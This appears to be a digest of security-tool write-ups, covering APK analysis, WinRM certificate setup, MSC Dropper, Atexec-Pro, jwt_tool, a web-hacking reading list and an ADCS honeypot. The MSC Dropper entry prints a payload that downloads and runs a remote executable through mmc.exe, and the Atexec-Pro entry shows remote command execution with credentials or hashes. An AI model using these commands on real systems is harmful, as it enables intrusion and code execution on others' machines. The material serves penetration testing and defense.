apkInspector – A Comprehensive Tool For APK Analysis And Evasion Detection

apkInspector is a tool designed to provide detailed insights into the zip structure of APK files, offering the capability to extract content and decode the AndroidManifest.xml file.

What sets APKInspector apart is its adherence to the zip specification during APK parsing, eliminating the need for reliance on external libraries.

This independence, allows APKInspector to be highly adaptable, effectively emulating Android’s installation process for APKs that cannot be parsed using standard libraries.

The main goal is to enable users to conduct static analysis on APKs that employ evasion techniques, especially when conventional methods prove ineffective.

Please check this blog post for more details.

How To Install

pip install apkInspector

or you can clone this repository and build and install locally:

git clone https://github.com/erev0s/apkInspector.git
cd apkInspector
poetry build
pip install dist/apkInspector-Version_here.tar.gz

CLI

apkInspector offers a command line tool with the same name, with the following options;

$ apkInspector -h
usage: apkInspector [-h] [-apk APK] [-f FILENAME] [-ll] [-lc] [-la] [-e] [-x] [-xa] [-m] [-sm SPECIFY_MANIFEST] [-a] [-v]

apkInspector is a tool designed to provide detailed insights into the zip structure of APK files, offering the capability to extract
content and decode the AndroidManifest.xml file.

options:
  -h, --help            show this help message and exit
  -apk APK              APK to inspect
  -f FILENAME, --filename FILENAME
                        Filename to provide info for
  -ll, --list-local     List all files by name from local headers
  -lc, --list-central   List all files by name from central directory header
  -la, --list-all       List all files from both central directory and local headers
  -e, --export          Export to JSON. What you list from the other flags, will be exported
  -x, --extract         Attempt to extract the file specified by the -f flag
  -xa, --extract-all    Attempt to extract all files detected in the central directory header
  -m, --manifest        Extract and decode the AndroidManifest.xml
  -sm SPECIFY_MANIFEST, --specify-manifest SPECIFY_MANIFEST
                        Pass an encoded AndroidManifest.xml file to be decoded
  -a, --analyze         Check an APK for static analysis evasion techniques
  -v, --version         Retrieves version information

For more information click here.

WinRM Client Certificate Authentication : Step-By-Step Setup And Configuration Guide

This repo demonstrates how to create certificates for WinRM/WSMan client certificate authentication and how to configure Windows to setup the service side to allow those certificates for client authentication.

It has some Ansible playbooks that can be used to do all the necessary steps plus some standalone scripts and background information to help you understand how certificate authentication works and is configured.

Background

WinRM authentication is typically done through the Negotiate protocol which attempts to use Kerberos authentication before falling back to NTLM.

It is possible to use client certificates through the TLS X.509 client certificate authentication but the documentation around this is hard to come by and hard to understand.

This repo will attempt to show how to both generate those certificates and how to configure the Windows host to use them for authentication.

It will also show how those certificates can be used in Ansible to perform certificate authentication.

Please keep in that certificate authentication does have its downsides such as:

  • it can only be mapped to a local Windows user, no domain accounts
  • the username and password must be mapped to the certificate, if the password changes, the cert will need to be re-mapped
  • an administrator on the Windows host can retrieve the local user password through the certificate mapping
  • the HTTP libraries used by psrp and winrm do not support
    • encrypted private keys, they must be stored without encryption
    • certs and private keys stored as a var, they must be a file

Usually these points are blockers (the last one especially) but if you are still interested then read on.

Requirements

  • Windows host with a HTTPS WinRM listener configured
  • Ansible collections
    • ansible.windows – Used to configured the Windows host
    • community.crypto – Used in setup_certificate.yml
  • Python libraries winrm and psrp for testing the connection

To install the Python libraries we can run:

python3 -m pip install pypsrp winrm

To install the required collections run

ansible-galaxy collection install -r requirements.yml

If you are not using setup_certificate.yml to generate the certificates, then community.crypto will not be needed.

How To Run

Before running we need to add in the inventory details for our Windows host. Edit inventory.ini and add the Windows host hostname/IP under the [windows] section. Also set the ansible_user and ansible_password value under the [windows:vars] section. We can verify that it worked by running ansible -i inventory.ini windows -m ansible.windows.win_ping.

Once the inventory has been setup we run the following playbooks with the CERT_USER set to the Windows user we want to create that’s mapped to the certificate:

CERT_USER=AnsibleCertUser
ansible-playbook -i inventory.ini setup_certificate.yml -e username=$CERT_USER
ansible-playbook -i inventory.ini setup_windows.yml -e username=$CERT_USER

For more information click here.

MSC Dropper – A Python Tool For Custom MSC File Creation And Payload Execution

MSC Dropper is a Python script designed to automate the creation of MSC (Microsoft Management Console) files with customizable payloads for arbitrary execution.

This tool leverages a method discovered by Samir (@SBousseaden) from Elastic Security Labs, termed #GrimResource, which facilitates initial access and evasion through mmc.exe.

Overview

The script allows users to generate MSC files that can execute arbitrary commands or scripts within the Microsoft Management Console environment.

This capability is particularly useful for security research and testing environments.

Features

  • Automated MSC File Generation: Create MSC files with specified commands or scripts embedded.
  • Payload Customization: Customize the payload to execute any command or script that mmc.exe can invoke.
  • Command-Line Interface: Simple command-line interface for quick generation of MSC files.

Installation

Clone the repository:

git clone https://github.com/ZERODETECTION/MSC_Dropper.git

Usage

Generating An MSC File

To generate an MSC file with a specific command or script:

python msc_dropper.py template1.msc out.msc "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"

Replace "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe" with the command or script you want to execute. Ensure that the command is formatted correctly to work within the Windows environment and mmc.exe.

Customizing Payloads

You can customize the payload directly within the template1.msc file or modify the script to automate more complex payload generation.

Atexec-Pro : Advanced Features And Usage For Remote Command Execution

Modified based on atexec.py.

The TSCH service is used by default(need port 135 a dynamic high port), port 445 is no longer required.

ATSVC need port 445

The technology is mainly based on this article by zcgonvh.

Features

  • CMD command execute
  • PS command execute
  • File Upload
  • File Download
  • .Net assembly execute
  • Support ATSVC and TSCH interface.

Note: functions uploaddownload and execute-assembly currently only support files up to 1MB in size. All functions do not bypass AMSI.

Usage

usage: atexec-pro.py [-h] [-i {TSCH,ATSVC}] [-session-id SESSION_ID] [-ts] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address] [-keytab KEYTAB]
                     target

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -i {TSCH,ATSVC}, --interface {TSCH,ATSVC}
                        Interface to use.
  -session-id SESSION_ID
                        an existed logon session to use (no output, no cmd.exe)
  -ts                   adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -codec CODEC          Sets encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with
                        https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found,
                        it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -keytab KEYTAB        Read keys for SPN from keytab file

Example

GetShell

python atexec-pro.py localhost/administrator:123@10.211.55.3

Project Horus – The Comprehensive Toolkit For Investigation Assistance

Project Horus, your ultimate pre-operations tool tailored for enhancing investigation processes.

This comprehensive toolkit leverages advanced APIs and data compilation strategies to streamline your investigative workflow.

Whether you’re a security professional or a tech enthusiast, Horus equips you with the necessary tools to elevate your analytical capabilities.

Table of Contents

  • 🚀 About Horus
  • ⚡ Installation and Usage Instructions
  • ⚙️ API Configuration
  • 🔮 Intended Features
  • 🤝 Current Maintainers
  • 🛠️ Contributing
  • 📧 Contact Me
  • 🤝 Acknowledgements

🚀 About Horus

Horus is an all-in-one encompassing tool for investigations assistance, from API leveraging to compiling data too. Its your pre-ops buddy!

⚡ Installation And Usage Instructions

To get started with this project, you will need Python installed on your device. Once it is installed, follow these steps:

  1. Clone this repository.
  2. cd to the ‘horus’ directory. (Make sure it isn’t the outermost folder)
  3. Install dependencies using the following command: pip install -r requirements.txt
  4. In the ‘horus’ directory, run python3 horus.py on Linux/MacOS, or py horus.py on Windows

Note: protonvpn-cli is a requirement for the ‘pvpn’ command

⚙️ API Configuration

To configure the APIs necessary for usage of certain commands, you can either manually enter them, or use the ‘apicon’ command

To manually configure API keys, navigate to /src/modules/var/pipes/api_config.json. Enter your API keys in their corresponding entries.

⚠️ Warning: If you are contributing to this repository or are testing it through a public fork, make sure to remove your API keys from the JSON file before pushing changes.

🔮 Intended Features

🟢 = Fully implemented or more than 80% done

🟡 = Partially implemented / In development

🔴 = To be implemented

For more information click here.

CVE-2024-29824 : Exploring The Remote Code Execution Vulnerability In Ivanti EPM

In recent developments, a significant security vulnerability has emerged within Ivanti Endpoint Manager (EPM), identified as CVE-2024-29824.

This critical flaw allows for remote code execution (RCE), posing a severe risk to systems running the affected software.

The exploit enables attackers to execute arbitrary code on target systems, potentially leading to full system compromise.

This article delves into the technical details of the vulnerability, its implications for cybersecurity, and the measures that can be taken to mitigate its effects.

As organizations increasingly rely on digital solutions for their operations, understanding and addressing such vulnerabilities is crucial.

We will explore how CVE-2024-29824 was discovered, its potential impact, and the steps developers and administrators need to take to secure their systems against this potent threat.

Awesome Web Hacking – A Comprehensive Guide To Tools, Techniques, And Resources

This list is for anyone wishing to learn about web application security but do not have a starting point.

You can help by sending Pull Requests to add more information.

If you’re not inclined to make PRs you can tweet me at @infoslack

Table Of Contents

  • Books
  • Documentation
  • Tools
  • Cheat Sheets
  • Docker
  • Vulnerabilities
  • Courses
  • Online Hacking Demonstration Sites
  • Labs
  • SSL
  • Security Ruby on Rails

Books

  • The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws
  • Hacking Web Apps: Detecting and Preventing Web Application Security Problems
  • Hacking Exposed Web Applications
  • SQL Injection Attacks and Defense
  • The Tangled WEB: A Guide to Securing Modern Web Applications
  • Web Application Obfuscation: ‘-/WAFs..Evasion..Filters//alert(/Obfuscation/)-‘
  • XSS Attacks: Cross Site Scripting Exploits and Defense
  • The Browser Hacker’s Handbook
  • The Basics of Web Hacking: Tools and Techniques to Attack the Web
  • Web Penetration Testing with Kali Linux
  • Web Application Security, A Beginner’s Guide
  • Hacking: The Art of Exploitation
  • Crypto 101 is an introductory course on cryptography
  • Metasploit Unleashed
  • Security Engineering
  • OpenSSL Cookbook
  • Learn and apply cryptographic techniques.
  • A guide to the key concepts, terminology, and technologies of cybersecurity perfect for anyone planning or implementing a security strategy.
  • Kickstart a career in cyber security by learning how to adapt your existing technical and non-technical skills.
  • A book about cryptographic techniques and Secret Key methods.
  • This practical book is a one-stop guide to implementing a robust application security program.
  • Practical guide to cyber threat hunting.
  • Bug Bounty Bootcamp
  • Hacking APIs
  • A book about building web apps that are ready for and resilient to any attack.

For more information click here.

Security Ninjas AppSec Training – Your Complete Guide To Mastering Application Security

This hands-on training lab consists of 10 fun real world like hacking exercises, corresponding to each of the OWASP Top 10 vulnerabilities.

Hints and solutions are provided along the way. Although the backend for this is written in PHP, vulnerabilities would remain the same across all web based languages, so the training would still be relevant even if you don’t actively code in PHP.

Making the Hands-on Lab Work:

Docker instructions

I would highly recommend that you run the training in a docker container because of the following:

  1. Setting up and destroying the environment would be super easy and quick.
  2. The docker container would be sandboxed which means that the vulnerable application wouldn’t be able to harm the host OS.

Setup:

  1. Setup docker. There are many ways to do this depending on the OS you use.
  2. Make sure docker has been installed correctly by running ‘docker version’.
  3. Start the Application Security Training container by running the following command (I chose port 8899 to avoid port allocation conflicts): ‘docker run -d -p 8899:80 opendns/security-ninjas’
  4. Get the IP address of your container: In my case the command was ‘boot2docker ip’ as I was running docker using boot2docker
  5. Go to your web browser and enter {IP address from step 4}:8899
  6. The training should be running now.
  7. Kill the container after you are done. Go back to the terminal and type ‘docker ps’. Get the container id of the training
  8. Then run ‘docker kill {container id}’

Running it using a web server:

If for some reason you are not able to run the training in a docker container, you may also run it using a web server.

  1. Download a web server (like Apache) and PHP.
  2. Download the source code from here and put it in the directory where the web server looks for files to serve.
  3. In the Security Ninjas sub-directory, change text file permissions – ‘chmod 777 *.txt’
  4. Make sure WHOIS is installed on the web server.
  5. Start the web server and reach the application from your web browser.

The following steps are optional but recommended:

  1. Install Firefox.
  2. Install the FoxyProxy plugin for Firefox. Then:
    • In select mode: Use proxy “Default” for all URLs.
    • Configure the Default proxy to use 127.0.0.1:8080.
  3. You can delete or disable this plugin after the exercise.
  4. Install Burp Suite free from. You could use some other proxy tool as well.
  5. You can get some basic Burp Suite tutorials from
  6. You can turn the proxy off for most of the exercises but for some, having the intercept on would make it much easier to inspect and alter the HTTP requests.
  7. Run the training in Firefox.

jwt_tool : Unlocking JWT Security With The JSON Web Token Toolkit

Discover the power of jwt_tool, a comprehensive toolkit designed for the robust testing of JSON Web Tokens (JWTs).

Perfect for pentesters and developers, this toolkit offers a variety of functions, from validating token authenticity to exploiting known vulnerabilities.

Dive into the capabilities of jwt_tool and enhance your security skills and knowledge.

Its functionality includes:

  • Checking the validity of a token
  • Testing for known exploits:
    • (CVE-2015-2951) The alg=none signature-bypass vulnerability
    • (CVE-2016-10555) The RS/HS256 public key mismatch vulnerability
    • (CVE-2018-0114) Key injection vulnerability
    • (CVE-2019-20933/CVE-2020-28637) Blank password vulnerability
    • (CVE-2020-28042) Null signature vulnerability
  • Scanning for misconfigurations or known weaknesses
  • Fuzzing claim values to provoke unexpected behaviours
  • Testing the validity of a secret/key file/Public Key/JWKS key
  • Identifying weak keys via a High-speed Dictionary Attack
  • Forging new token header and payload contents and creating a new signature with the key or via another attack method
  • Timestamp tampering
  • RSA and ECDSA key generation, and reconstruction (from JWKS files)
  • …and lots more!

Audience

This tool is written for pentesters, who need to check the strength of the tokens in use, and their susceptibility to known attacks.

A range of tampering, signing and verifying options are available to help delve deeper into the potential weaknesses present in some JWT libraries.

It has also been successful for CTF challengers – as CTFs seem keen on JWTs at present.

It may also be useful for developers who are using JWTs in projects, but would like to test for stability and for known vulnerabilities when using forged tokens.


Requirements

This tool is written natively in Python 3 (version 3.6+) using the common libraries, however various cryptographic funtions (and general prettiness/readability) do require the installation of a few common Python libraries.
(An older Python 2.x version of this tool is available on the legacy branch for those who need it, although this is no longer be supported or updated)


Installation

Docker

The preferred usage for jwt_tool is with the official Dockerhub-hosted jwt_tool docker image
The base command for running this is as follows:
Base command for running jwt_tool:
docker run -it --network "host" --rm -v "${PWD}:/tmp" -v "${HOME}/.jwt_tool:/root/.jwt_tool" ticarpi/jwt_tool

By using the above command you can tag on any other arguments as normal.
Note that local files in your current working directory will be mapped into the docker container’s /tmp directory, so you can use them using that absolute path in your arguments.
i.e.
/tmp/localfile.txt

Manual Install

Installation is just a case of downloading the jwt_tool.py file (or git clone the repo).
(chmod the file too if you want to add it to your $PATH and call it from anywhere.)

$ git clone https://github.com/ticarpi/jwt_tool
$ python3 -m pip install -r requirements.txt

On first run the tool will generate a config file, some utility files, logfile, and a set of Public and Private keys in various formats.

Custom Configs

  • To make best use of the scanning options it is strongly advised to copy the custom-generated JWKS file somewhere that can be accessed remotely via a URL.
    • This address should then be stored in jwtconf.ini as the “jwkloc” value.
  • In order to capture external service interactions – such as DNS lookups and HTTP requests – put your unique address for Burp Collaborator (or other alternative tools such as RequestBin) into the config file as the “httplistener” value.
    • Review the other options in the config file to customise your experience.

Colour Bug In Windows

To fix broken colours in Windows cmd/Powershell: uncomment the below two lines in jwt_tool.py (remove the “# ” from the beginning of each line)
You will also need to install colorama: python3 -m pip install colorama

# import colorama
# colorama.init()

For more information click here.

Certiception – Reinventing Network Security With Deceptive Active Directory Certificate Services

Certiception is a honeypot for Active Directory Certificate Services (ADCS), designed to trap attackers with a realistic and attractive bait that triggers highly relevant alerts.

Developed by the SRLabs Red Team, Certiception creates a vulnerable-looking certificate template in your ADCS environment, sets up restrictions to prevent exploitation, and supports in setting up effective alerting.

Originally released at Troopers24, Certiception comes with a strategic guide to effective deception: The Red Teamers’ guide to deception

Background

In our Red Team and Incident Management engagements we regularly observe that lateral movement and privilege escalation go undetected.

If detections trigger at all, they are not reacted to in a timely manner, because false positives are commonplace.

We believe internal honeypots (aka. canaries, aka. deception tech) are an effective way for defenders to catch threats that make it through initial defenses.

Internal honeypots are intentional traps for attackers placed in your network.

They look vulnerable but trigger an alert on exploitation. Here’s why we think deception has great potential:

  • Low effort and cost: Setup can rely on existing tools such as a SIEM.
  • High relevance alerts: A triggered honeypot hints at a significant threat, so the alerts are worth investigating.
  • Low noise: Designed to trigger only on malicious activity, internal honeypots have a low false positive rate.

Despite their potential, we regularly encounter fundamentally ineffective deception setups. To help defenders create more effective honeypots, Certiception comes with an extensive deception strategy guide.

Active Directory Certificate Services (ADCS) is an ideal location for a honeypot:

  1. Easy Access: Accessible by all domain users, ADCS is easy for attackers to discover.
  2. High Stakes: Vulnerabilities can lead to full domain compromise, making exploitation highly attractive.
  3. Common Knowledge: Vulnerabilities and exploitation tools are widely known.
  4. Authenticity: Vulnerable ADCS templates are commonplace, raising little contempt.
  5. Under-Monitored: Many networks barely monitor ADCS, encouraging even cautious attackers to dare exploitation.

This is why we built Certiception.

Concept

Certiception sets up a new CA in your environment and configures an ESC1 honeypot.

It is implemented as an Ansible playbook calling multiple roles. Overall, the following steps are executed:

  • Set up a new CA, add a “vulnerable” ESC1 template and enable it only on the new CA
  • Install and configure the TameMyCerts policy module to prevent issuance if certificate signing requests contain a SAN
  • Enable extended audit log to include template names in event logs
  • Print a SIGMA rule to set up alerting in your SIEM
  • Set up continuous checks with Certify to catch any other CA enabling the vulnerable template (not pushed yet, will be added to the repo in the next days)

Parameters like the CA or template name can be customized to disguise the honeypot.